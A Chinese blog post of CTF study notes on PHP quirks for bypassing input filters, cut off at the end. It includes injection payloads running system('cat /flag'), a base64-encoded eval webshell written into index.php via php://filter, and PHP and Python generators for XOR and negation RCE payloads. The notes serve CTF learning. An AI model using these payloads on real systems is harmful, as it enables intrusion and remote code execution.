<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no"><meta name="author" content="userq"><meta name="renderer" content="webkit"><meta name="copyright" content="userq"><meta name="keywords" content="MyBlog"><meta name="description" content="MyBlog"><meta name="Cache-Control" content="no-cache"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><title>php特性 · Mr.cheng's Blog</title><link rel="stylesheet" href="/css/style.css?v=2018.7.9"><link rel="stylesheet" href="/css/animation.css?v=2018.7.9"><link rel="icon" href="/img/assets/favicon.ico"><link rel="stylesheet" href="https://cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css?version=1.5.6"><!-- scripts--><script>(function( w ){
  "use strict";
  // rel=preload support test
  if( !w.loadCSS ){
    w.loadCSS = function(){};
  }
  // define on the loadCSS obj
  var rp = loadCSS.relpreload = {};
  // rel=preload feature support test
  // runs once and returns a function for compat purposes
  rp.support = (function(){
    var ret;
    try {
      ret = w.document.createElement( "link" ).relList.supports( "preload" );
    } catch (e) {
      ret = false;
    }
    return function(){
      return ret;
    };
  })();

  // if preload isn't supported, get an asynchronous load by using a non-matching media attribute
  // then change that media back to its intended value on load
  rp.bindMediaToggle = function( link ){
    // remember existing media attr for ultimate state, or default to 'all'
    var finalMedia = link.media || "all";

    function enableStylesheet(){
      link.media = finalMedia;
    }

    // bind load handlers to enable media
    if( link.addEventListener ){
      link.addEventListener( "load", enableStylesheet );
    } else if( link.attachEvent ){
      link.attachEvent( "onload", enableStylesheet );
    }

    // Set rel and non-applicable media type to start an async request
    // note: timeout allows this to happen async to let rendering continue in IE
    setTimeout(function(){
      link.rel = "stylesheet";
      link.media = "only x";
    });
    // also enable media after 3 seconds,
    // which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
    setTimeout( enableStylesheet, 3000 );
  };

  // loop through link elements in DOM
  rp.poly = function(){
    // double check this to prevent external calls from running
    if( rp.support() ){
      return;
    }
    var links = w.document.getElementsByTagName( "link" );
    for( var i = 0; i < links.length; i++ ){
      var link = links[ i ];
      // qualify links to those with rel=preload and as=style attrs
      if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
        // prevent rerunning on link
        link.setAttribute( "data-loadcss", true );
        // bind listeners to toggle media back
        rp.bindMediaToggle( link );
      }
    }
  };

  // if unsupported, run the polyfill
  if( !rp.support() ){
    // run once at least
    rp.poly();

    // rerun poly on an interval until onload
    var run = w.setInterval( rp.poly, 500 );
    if( w.addEventListener ){
      w.addEventListener( "load", function(){
        rp.poly();
        w.clearInterval( run );
      } );
    } else if( w.attachEvent ){
      w.attachEvent( "onload", function(){
        rp.poly();
        w.clearInterval( run );
      } );
    }
  }


  // commonjs
  if( typeof exports !== "undefined" ){
    exports.loadCSS = loadCSS;
  }
  else {
    w.loadCSS = loadCSS;
  }
}( typeof global !== "undefined" ? global : this ) );</script><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" defer></script><script src="/js/main.js?v=2018.7.9" defer></script><!-- fancybox--><link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'"><script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script><!-- busuanzi--><script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script><meta name="generator" content="Hexo 7.3.0"><link rel="alternate" href="/atom.xml" title="MyBlog" type="application/atom+xml">
</head><body><section class="profile-close" id="cxo-profile"><div class="profile-avatar"><i class="fa fa-caret-left"></i><img src="/img/assets/cat.png"></div><!--.profile-saying
  i.fa.fa-comment
  .saying--><div class="cxo-profile-inner"><div class="profile-name">userq</div><div class="profile-signature">for me</div><div class="friends"><div>FRIENDS</div><span><a href="//1768161086.github.io/" target="_black">friendA</a></span><span><a href="//github.com/" target="_black">friendB</a></span><span><a href="//github.com/" target="_black">friendC</a></span></div><div class="read-progress"></div></div></section><header id="cxo-intro" style="height: 70vh;background-image: url(/img/intro/index-bg.png);"><nav id="cxo-intro-nav"><section><div class="intro-nav-title"><a href="/">Mr.cheng's Blog</a></div><div class="intro-nav-label-box"><a href="/">Home</a><a href="/about/">About</a><a href="/archives/">Archives</a><a href="/tags/">Tags</a></div><i class="fa fa-bars intro-nav-menu"><div class="intro-nav-drop"><a href="/">Home</a><a href="/about/">About</a><a href="/archives/">Archives</a><a href="/tags/">Tags</a></div></i><div class="clear"></div></section></nav><h1 class="post-title">php特性</h1><div class="post-intros"><div class="post-intro-meta"><span class="post-intro-time"><i class="post-intro-calendar fa fa-calendar"></i><span>2025-01-25</span></span><span class="post-intro-tags"><a class="intro-tag fa fa-tag" href="javascript:void(0)" date-tags="web"> web</a><a class="intro-tag fa fa-tag" href="javascript:void(0)" date-tags="原创"> 原创</a><a class="intro-tag fa fa-tag" href="javascript:void(0)" date-tags="php特性"> php特性</a></span></div></div></header><article class="cxo-up" id="cxo-content-outer"><section id="cxo-content-inner"><article class="article-entry" id="post"><blockquote>
<p>php特性相关函数介绍</p>
</blockquote>
<h2 id="1-intval-函数："><a href="#1-intval-函数：" class="headerlink" title="1.intval() 函数："></a>1.intval() 函数：</h2><p>通过使用指定的进制 base 转换（默认是十进制），返回变量 var 的 integer 数值。 intval() 不能用于 object，否则会产生 E_NOTICE 错误并返回 1 。 故此传入?num[]&#x3D;1,产生错误返回1。 并且preg_math()传入数组参数也会直接返回0</p>
<h2 id="2-！strpos-num-“0”-："><a href="#2-！strpos-num-“0”-：" class="headerlink" title="2.！strpos($num, “0”)："></a>2.！strpos($num, “0”)：</h2><p>strpos() 函数查找字符串在另一字符串中第一次出现的位置 ，这里要求是第一个字符不是0</p>
<h2 id="3-in-array-函数："><a href="#3-in-array-函数：" class="headerlink" title="3.in_array() 函数："></a>3.in_array() 函数：</h2><p>存在弱比较的漏洞，如果没有设置第三个参数，in_array() 函数在比较时默认是弱类型比较，这意味着它会进行自动类型转换。例如数组中的元素是整数，而搜索的值是字符串，PHP 会尝试将字符串转换为整数来进行比较。比如上面字符串类型的 1.php 就自动转换为了整数 1，也就符合在数组中的条件。</p>
<h2 id="4-php运算符优先级："><a href="#4-php运算符优先级：" class="headerlink" title="4.php运算符优先级："></a>4.php运算符优先级：</h2><p>&amp;&amp; &gt; || &gt; &#x3D; &gt; and &gt; or</p>
<h2 id="5-substr-string-start-length-函数："><a href="#5-substr-string-start-length-函数：" class="headerlink" title="5.substr(string,start,length) 函数："></a>5.substr(string,start,length) 函数：</h2><p>返回字符串从start开始到length结束的部分</p>
<h2 id="6-hex2bin-："><a href="#6-hex2bin-：" class="headerlink" title="6.hex2bin()："></a>6.hex2bin()：</h2><p>十六进制转ascii码函数</p>
<h2 id="7-call-user-func-函数："><a href="#7-call-user-func-函数：" class="headerlink" title="7.call_user_func() 函数："></a>7.call_user_func() 函数：</h2><p>用于调用方法或者变量，第一个参数是被调用的函数，第二个是调用的函数的参数。</p>
<h2 id="8-parse-str-string-array"><a href="#8-parse-str-string-array" class="headerlink" title="8.parse_str(string,array):"></a>8.parse_str(string,array):</h2><p>把查询字符串解析到变量中</p>
<h2 id="9-strrev函数："><a href="#9-strrev函数：" class="headerlink" title="9.strrev函数："></a>9.strrev函数：</h2><p>用于反转字符串</p>
<h2 id="10-ereg函数可以用-00截断"><a href="#10-ereg函数可以用-00截断" class="headerlink" title="10.ereg函数可以用%00截断"></a>10.ereg函数可以用%00截断</h2><h2 id="11-魔术方法-toString-："><a href="#11-魔术方法-toString-：" class="headerlink" title="11.魔术方法 __toString() ："></a>11.魔术方法 __toString() ：</h2><p>在对象被当作字符串处理时自动调用。很多 PHP 内置类（如 Exception、CachingIterator 和 ReflectionClass）都实现了这个方法。因此，通过使用这些类，可以将代码注入到 eval 中并输出结果。</p>
<h2 id="12-var-dump-函数："><a href="#12-var-dump-函数：" class="headerlink" title="12.var_dump()函数："></a>12.var_dump()函数：</h2><p>该函数用于输出变量的相关信息</p>
<h2 id="13-php-中查看目录的函数有："><a href="#13-php-中查看目录的函数有：" class="headerlink" title="13.php 中查看目录的函数有："></a>13.php 中查看目录的函数有：</h2><p>scandir()、golb()、dirname()、basename()、realpath()、getcwd() ，其中 scandir()、golb() 、dirname()、basename()、realpath() 都需要给定参数，而 getcwd() 不需要参数，getchwd() 函数会返回当前工作目录。</p>
<h2 id="14-php内置类FilesystemIterator"><a href="#14-php内置类FilesystemIterator" class="headerlink" title="14.php内置类FilesystemIterator"></a>14.php内置类FilesystemIterator</h2><p> 获取指定目录下的所有文件</p>
<h2 id="15-和反引号被过滤"><a href="#15-和反引号被过滤" class="headerlink" title="15.$ 和反引号被过滤"></a>15.$ 和反引号被过滤</h2><p>采用反射类的方法：?v1&#x3D;1&amp;v2&#x3D;echo new ReflectionClass&amp;v3&#x3D;;</p>
<p><mark>ReflectionClass类是PHP内置的反射机制类之一，用于获取和操作类的相关信息。ReflectionClass类可以在运行时获取类的名称、属性、方法、接口等信息，并且可以动态地创建、修改、调用类的实例和方法。ReflectionClass类是PHP中反射机制的核心类之一，也是很多框架和库的重要组成部分。</mark></p>
<h2 id="16-GLOBALS-eval-v1-v2-var-dump-v1"><a href="#16-GLOBALS-eval-v1-v2-var-dump-v1" class="headerlink" title="16..$GLOBALS eval(&quot;$$v1 = &amp;$$v2;&quot;);    var_dump($$v1);"></a>16..$GLOBALS <code>eval(&quot;$$v1 = &amp;$$v2;&quot;);    var_dump($$v1);</code></h2><p>引用全局作用域中可用的全部变量 一个包含了全部变量的全局组合数组。变量的名字就是数组的键。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?v1=ctfshow&amp;v2=GLOBALS</span><br></pre></td></tr></table></figure>

<h2 id="17-is-file-函数"><a href="#17-is-file-函数" class="headerlink" title="17.is_file() 函数"></a>17.is_file() 函数</h2><p>用于检查指定的文件是否是常规的文件，如果是，则返回 TRUE。这里需要绕过这个 is_file 的检测，但是又要能被 highlight_file 识别，使用 php 伪协议</p>
<h2 id="18-过滤filter："><a href="#18-过滤filter：" class="headerlink" title="18.过滤filter："></a>18.过滤filter：</h2><p>?file&#x3D;compress.zlib:&#x2F;&#x2F;flag.php（zip、bzip、zlib）</p>
<h2 id="19-trim是函数移除字符串两侧的空白字符或其他预定义字符（-0c可绕过）"><a href="#19-trim是函数移除字符串两侧的空白字符或其他预定义字符（-0c可绕过）" class="headerlink" title="19.trim是函数移除字符串两侧的空白字符或其他预定义字符（%0c可绕过）"></a>19.trim是函数移除字符串两侧的空白字符或其他预定义字符（%0c可绕过）</h2><p><code>if(is_numeric($num) and $num!==&#39;36&#39; and trim($num)!==&#39;36&#39; and filter($num)==&#39;36&#39;)&#123;``if($num==&#39;36&#39;)&#123;    echo $flag;</code> ?num&#x3D;%0c36</p>
<h2 id="19-1过滤echo-利用-SERVER-argv-0-就可以绕过对-isset-fl0g-的判断，用-代表空格"><a href="#19-1过滤echo-利用-SERVER-argv-0-就可以绕过对-isset-fl0g-的判断，用-代表空格" class="headerlink" title="19.1过滤echo:利用$_SERVER[&#39;argv&#39;][0] 就可以绕过对**isset($fl0g)**的判断，用+代表空格"></a>19.1过滤echo:利用<code>$_SERVER[&#39;argv&#39;][0]</code> 就可以绕过对**isset($fl0g)**的判断，用+代表空格</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">get:</span><br><span class="line">?$fl0g=flag_give_me;</span><br><span class="line">post:</span><br><span class="line">CTF_SHOW=1&amp;CTF[SHOW.COM=1&amp;fun=eval($a[0])</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="20-在php中变量名只有数字字母下划线，被get或者post传入的变量名，如果含有空格、-、-则会被转化为-，所以按理来说我们构造不出CTF-SHOW-COM这个变量-因为含有-，但php中有个特性就是如果传入-，它被转化为-之后，后面的字符就会被保留下来不会被替换"><a href="#20-在php中变量名只有数字字母下划线，被get或者post传入的变量名，如果含有空格、-、-则会被转化为-，所以按理来说我们构造不出CTF-SHOW-COM这个变量-因为含有-，但php中有个特性就是如果传入-，它被转化为-之后，后面的字符就会被保留下来不会被替换" class="headerlink" title="20.在php中变量名只有数字字母下划线，被get或者post传入的变量名，如果含有空格、+、[则会被转化为_，所以按理来说我们构造不出CTF_SHOW.COM这个变量(因为含有.)，但php中有个特性就是如果传入[，它被转化为_之后，后面的字符就会被保留下来不会被替换"></a>20.在php中变量名只有数字字母下划线，被get或者post传入的变量名，如果含有空格、+、[则会被转化为_，所以按理来说我们构造不出CTF_SHOW.COM这个变量(因为含有.)，但php中有个特性就是如果传入[，它被转化为_之后，后面的字符就会被保留下来不会被替换</h2><h2 id="21-extract-函数："><a href="#21-extract-函数：" class="headerlink" title="21.extract() 函数："></a>21.extract() 函数：</h2><p>从数组中将变量导入到当前的符号表，使用数组键名作为变量名，使用数组键值作为变量值。举例就是?a&#x3D;2，就会变成$a&#x3D;2</p>
<h2 id="22-var-dump-call-user-func-call-user-func-f1-f2"><a href="#22-var-dump-call-user-func-call-user-func-f1-f2" class="headerlink" title="22.var_dump(call_user_func(call_user_func($f1,$f2)));"></a>22.<code>var_dump(call_user_func(call_user_func($f1,$f2)));</code></h2><p>._()&#x3D;&#x3D;gettext() 是gettext()的拓展函数，开启text扩展get_defined_vars — 返回由所有已定义变量所组成的数组。</p>
<p><code>var_dump(call_user_func(call_user_func($f1,$f2)));</code> pyload:?f1&#x3D;_&amp;f2&#x3D;get_defined_vars</p>
<h2 id="23-stripos-函数："><a href="#23-stripos-函数：" class="headerlink" title="23.stripos() 函数："></a>23.stripos() 函数：</h2><p>查找字符串在另一字符串中第一次出现的位置（区分大小写），返回字符串在另一字符串中第一次出现的位置，如果没有找到字符串则返回 FALSE。</p>
<h2 id="24-既要求-ctfshow-前面不能有字符，但又要求得找到字符串-36Dctfshow。利用-preg-match-的回溯绕过，回溯次数默认上限是-100-万。"><a href="#24-既要求-ctfshow-前面不能有字符，但又要求得找到字符串-36Dctfshow。利用-preg-match-的回溯绕过，回溯次数默认上限是-100-万。" class="headerlink" title="24.既要求 ctfshow 前面不能有字符，但又要求得找到字符串 36Dctfshow。利用 preg_match 的回溯绕过，回溯次数默认上限是 100 万。"></a>24.既要求 ctfshow 前面不能有字符，但又要求得找到字符串 36Dctfshow。利用 preg_match 的回溯绕过，回溯次数默认上限是 100 万。</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">echo str_repeat(&#x27;very&#x27;, &#x27;250000&#x27;).&#x27;36Dctfshow&#x27;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><code>或者null,null!=false,所以可以绕过stripos函数</code><br>然后数组可以绕过preg_match</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">POST:</span><br><span class="line">f[]=1</span><br><span class="line">或f=ctfshow</span><br></pre></td></tr></table></figure>

<h2 id="25-正则匹配"><a href="#25-正则匹配" class="headerlink" title="25.正则匹配"></a>25.正则匹配</h2><table>
<thead>
<tr>
<th>.+?表示匹配任意字符一个或则多个。</th>
</tr>
</thead>
<tbody><tr>
<td>.*? 表示匹配任意字符0个或多个。</td>
</tr>
<tr>
<td>. 匹配除换行符 \n 之外的任何单字符。</td>
</tr>
<tr>
<td>+ 匹配前面的子表达式一次或多次。</td>
</tr>
<tr>
<td>? 匹配前面的子表达式零次或一次，或指明一个非贪婪限定符。</td>
</tr>
<tr>
<td>&#x2F;i不区分大小写</td>
</tr>
<tr>
<td>&#x2F;s 匹配任何空白字符，包括空格、制表符、换页符等等。</td>
</tr>
</tbody></table>
<h2 id="26-parse-str-函数"><a href="#26-parse-str-函数" class="headerlink" title="26.parse_str()函数:"></a>26.parse_str()函数:</h2><p>把查询字符串解析到变量中</p>
<h2 id="27-看到shell-exec和blacklist，知道是无回显rce。"><a href="#27-看到shell-exec和blacklist，知道是无回显rce。" class="headerlink" title="27.看到shell_exec和blacklist，知道是无回显rce。"></a>27.看到shell_exec和blacklist，知道是无回显rce。</h2><p>tee命令：?cmd&#x3D;ls &#x2F;|tee a.txt</p>
<p>将a.txt复制到b.txt或ls | tee b.txt,将ls命令的执行结果写入b.txt</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tee a.txt b.txt</span><br></pre></td></tr></table></figure>

<h2 id="28-在-php-中，-用于访问类的实例成员（属性和方法），"><a href="#28-在-php-中，-用于访问类的实例成员（属性和方法），" class="headerlink" title="28.在 php 中，-&gt; 用于访问类的实例成员（属性和方法），"></a>28.在 php 中，-&gt; 用于访问类的实例成员（属性和方法），</h2><p>我们需要先实例化类，然后通过实例对象来调用其成员；而 :: 用于访问类的静态成员（静态属性和静态方法）和常量，静态成员属于类本身，而不是任何具体实例，因此不需要实例化类即可调用它们。</p>
<h2 id="29-无写权限，无法使用tee命令，可用时间盲注"><a href="#29-无写权限，无法使用tee命令，可用时间盲注" class="headerlink" title="29.无写权限，无法使用tee命令，可用时间盲注"></a>29.无写权限，无法使用tee命令，可用时间盲注</h2><h2 id="30-foreach-files-as-file-…-：遍历数组中的每一个文件。"><a href="#30-foreach-files-as-file-…-：遍历数组中的每一个文件。" class="headerlink" title="30.foreach($files as $file) { … }：遍历数组中的每一个文件。"></a>30.foreach($files as $file) { … }：遍历数组中的每一个文件。</h2><h2 id="31-php内的”-“在做代码执行的时候，会识别特殊字符串，绕过黑名单，如：func-system-p-find-name-flag"><a href="#31-php内的”-“在做代码执行的时候，会识别特殊字符串，绕过黑名单，如：func-system-p-find-name-flag" class="headerlink" title="31.php内的” \ “在做代码执行的时候，会识别特殊字符串，绕过黑名单，如：func&#x3D;\system&amp;p&#x3D;find &#x2F; -name flag*"></a>31.php内的” \ “在做代码执行的时候，会识别特殊字符串，绕过黑名单，如：func&#x3D;\system&amp;p&#x3D;find &#x2F; -name flag*</h2><h2 id="32-session-id-可以用来获取-设置-当前会话-ID。-在我们使用-session-id-的时候-需要使用session-start-来开启session会话-我们尝试构造payload"><a href="#32-session-id-可以用来获取-设置-当前会话-ID。-在我们使用-session-id-的时候-需要使用session-start-来开启session会话-我们尝试构造payload" class="headerlink" title="32.session_id() 可以用来获取&#x2F;设置 当前会话 ID。 在我们使用 session_id()的时候 需要使用session_start()来开启session会话 我们尝试构造payload"></a>32.session_id() 可以用来获取&#x2F;设置 当前会话 ID。 在我们使用 session_id()的时候 需要使用session_start()来开启session会话 我们尝试构造payload</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?exp=highlight_file(session_id(session_start()));</span><br></pre></td></tr></table></figure>

<p>session_id(session_start())<br>使用session之前需要通过session_start()告诉PHP使用session，php默认是不主动使用session的。<br>session_id()可以获取到当前的session id。cookie:PHPSESSID&#x3D;flag.php</p>
<p>33.highlight_file() 函数对文件进行语法高亮显示，本函数是show_source() 的别名<br>34.next() 输出数组中的当前元素和下一个元素的值。<br>35.array_reverse() 函数以相反的元素顺序返回数组。(主要是能返回值)<br>36.scandir() 函数返回指定目录中的文件和目录的数组。<br>37.pos() 输出数组中的当前元素的值。<br>38.localeconv() 函数返回一个包含本地数字及货币格式信息的数组，该数组的第一个元素就是”.”。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">exp=highlight_file(next(array_reverse(scandir(pos(localeconv())))));</span><br></pre></td></tr></table></figure>

<p>原理：<br>loacleconv 函数会固定返回一个 . 然后pos将我们获得的 .返回到我们构造的 payload 使得 scandir能够返回当前目录下的数组（换句话说，就是读出当前目录下的文件） rray_reverse()以相反的顺序输出（目的是以正序输出查询出来的内容）然后 next 提取第二个元素（将.过滤出去），最后用highlight_file()给显示出来。</p>
<h2 id="39-fputs-函数将内容写入一个打开的文件中。"><a href="#39-fputs-函数将内容写入一个打开的文件中。" class="headerlink" title="39.fputs() 函数将内容写入一个打开的文件中。"></a>39.fputs() 函数将内容写入一个打开的文件中。</h2><h2 id="40-create-function-代码注入："><a href="#40-create-function-代码注入：" class="headerlink" title="40.create_function()代码注入："></a>40.<code>create_function()</code>代码注入：</h2><p>create_function(string a, string b)会创造一个匿名函数，传入的两个参数均为字符串</p>
<p>其中，字符串a中表示函数需要传入的参数，字符串b表示函数中的执行语句</p>
<p>例如，create_function(‘$a’, ‘echo(“hello”);’)</p>
<p>因为<code>create_function</code>自带eval命令执行，因此我们需要传入<code>$a</code>为<code>\create_function</code>；</p>
<p>而对于参数<code>$b</code>，我们需要让它执行system()函数，用于回显flag，因此传入<code>$b</code>为<code>&#125;system(&#39;cat /flag&#39;);/*</code></p>
<p>大括号直接把function闭合了，因此后面的system可以正常进行，而\则是为了绕过正则</p>
<h2 id="41-调用类中的函数可用："><a href="#41-调用类中的函数可用：" class="headerlink" title="41.调用类中的函数可用："></a>41.调用类中的函数可用：</h2><p>类名称：：函数名</p>
<p>或者ctfshow[0]&#x3D;ctfshow&amp;ctfshow[1]&#x3D;getFlag</p>
<h2 id="42-file-put-contents-GET-ctf-POST-show"><a href="#42-file-put-contents-GET-ctf-POST-show" class="headerlink" title="42.file_put_contents($_GET[&#39;ctf&#39;], $_POST[&#39;show&#39;]);"></a>42.<code>file_put_contents($_GET[&#39;ctf&#39;], $_POST[&#39;show&#39;]);</code></h2><p>直接用伪协议把木马写入到index.php就可以了。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">get：?ctf=php://filter/write=convert.base64-decode/resource=index.php</span><br><span class="line">post：show=PD9waHAgQGV2YWwoJF9QT1NUWydqeiddKTs/Pg==</span><br></pre></td></tr></table></figure>

<p>然后蚁剑连接也行，直接post也可。</p>
<h2 id="43-过滤字母数字符号执行eval"><a href="#43-过滤字母数字符号执行eval" class="headerlink" title="43.过滤字母数字符号执行eval:"></a>43.过滤字母数字符号执行eval:</h2><p>生成可用字符的字典：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">//或</span><br><span class="line">function orRce($par1, $par2)&#123;</span><br><span class="line">    $result = (urldecode($par1)|urldecode($par2));</span><br><span class="line">    return $result;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">//异或</span><br><span class="line">function xorRce($par1, $par2)&#123;</span><br><span class="line">    $result = (urldecode($par1)^urldecode($par2));</span><br><span class="line">    return $result;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">//取反</span><br><span class="line">function negateRce()&#123;</span><br><span class="line">    fwrite(STDOUT,&#x27;[+]your function: &#x27;);</span><br><span class="line"></span><br><span class="line">    $system=str_replace(array(&quot;\r\n&quot;, &quot;\r&quot;, &quot;\n&quot;), &quot;&quot;, fgets(STDIN));</span><br><span class="line"></span><br><span class="line">    fwrite(STDOUT,&#x27;[+]your command: &#x27;);</span><br><span class="line"></span><br><span class="line">    $command=str_replace(array(&quot;\r\n&quot;, &quot;\r&quot;, &quot;\n&quot;), &quot;&quot;, fgets(STDIN));</span><br><span class="line"></span><br><span class="line">    echo &#x27;[*] (~&#x27;.urlencode(~$system).&#x27;)(~&#x27;.urlencode(~$command).&#x27;);&#x27;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">//mode=1代表或，2代表异或，3代表取反</span><br><span class="line">//取反的话，就没必要生成字符去跑了，因为本来就是不可见字符，直接绕过正则表达式</span><br><span class="line">function generate($mode, $preg=&#x27;/[0-9]/i&#x27;)&#123;</span><br><span class="line">    if ($mode!=3)&#123;</span><br><span class="line">        $myfile = fopen(&quot;rce.txt&quot;, &quot;w&quot;);</span><br><span class="line">        $contents = &quot;&quot;;</span><br><span class="line"></span><br><span class="line">        for ($i=0;$i&lt;256;$i++)&#123;</span><br><span class="line">            for ($j=0;$j&lt;256;$j++)&#123;</span><br><span class="line">                if ($i&lt;16)&#123;</span><br><span class="line">                    $hex_i = &#x27;0&#x27;.dechex($i);</span><br><span class="line">                &#125;else&#123;</span><br><span class="line">                    $hex_i = dechex($i);</span><br><span class="line">                &#125;</span><br><span class="line">                if ($j&lt;16)&#123;</span><br><span class="line">                    $hex_j = &#x27;0&#x27;.dechex($j);</span><br><span class="line">                &#125;else&#123;</span><br><span class="line">                    $hex_j = dechex($j);</span><br><span class="line">                &#125;</span><br><span class="line">                if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j)))&#123;</span><br><span class="line">                    echo &quot;&quot;;</span><br><span class="line">                &#125;else&#123;</span><br><span class="line">                    $par1 = &quot;%&quot;.$hex_i;</span><br><span class="line">                    $par2 = &#x27;%&#x27;.$hex_j;</span><br><span class="line">                    $res = &#x27;&#x27;;</span><br><span class="line">                    if ($mode==1)&#123;</span><br><span class="line">                        $res = orRce($par1, $par2);</span><br><span class="line">                    &#125;else if ($mode==2)&#123;</span><br><span class="line">                        $res = xorRce($par1, $par2);</span><br><span class="line">                    &#125;</span><br><span class="line"></span><br><span class="line">                    if (ord($res)&gt;=32&amp;ord($res)&lt;=126)&#123;</span><br><span class="line">                        $contents=$contents.$res.&quot; &quot;.$par1.&quot; &quot;.$par2.&quot;\n&quot;;</span><br><span class="line">                    &#125;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line">        fwrite($myfile,$contents);</span><br><span class="line">        fclose($myfile);</span><br><span class="line">    &#125;else&#123;</span><br><span class="line">        negateRce();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">generate(2,&#x27;/[A-Za-z0-9_\%\\|\~\&#x27;\,\.\:\@\&amp;\*\+\- ]+/&#x27;);</span><br><span class="line">//1代表模式，后面的是过滤规则</span><br></pre></td></tr></table></figure>

<p>生成 payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"># -*- coding: utf-8 -*-</span><br><span class="line"></span><br><span class="line">def action(arg):</span><br><span class="line">    s1 = &quot;&quot;</span><br><span class="line">    s2 = &quot;&quot;</span><br><span class="line">    with open(&quot;rce.txt&quot;, &quot;r&quot;) as f:</span><br><span class="line">        lines = f.readlines()</span><br><span class="line">        for i in arg:</span><br><span class="line">            for line in lines:</span><br><span class="line">                if line.startswith(i):</span><br><span class="line">                    s1 += line[2:5]</span><br><span class="line">                    s2 += line[6:9]</span><br><span class="line">                    break</span><br><span class="line">    output = &quot;(\&quot;&quot; + s1 + &quot;\&quot;^\&quot;&quot; + s2 + &quot;\&quot;)&quot;</span><br><span class="line">    return output</span><br><span class="line"></span><br><span class="line">while True:</span><br><span class="line">    function_input = input(&quot;\n[+] 请输入你的函数：&quot;)//system</span><br><span class="line">    command_input = input(&quot;[+] 请输入你的命令：&quot;)//ls</span><br><span class="line">    param = action(function_input) + action(command_input)</span><br><span class="line">    print(&quot;\n[*] 构造的Payload:&quot;, param)</span><br><span 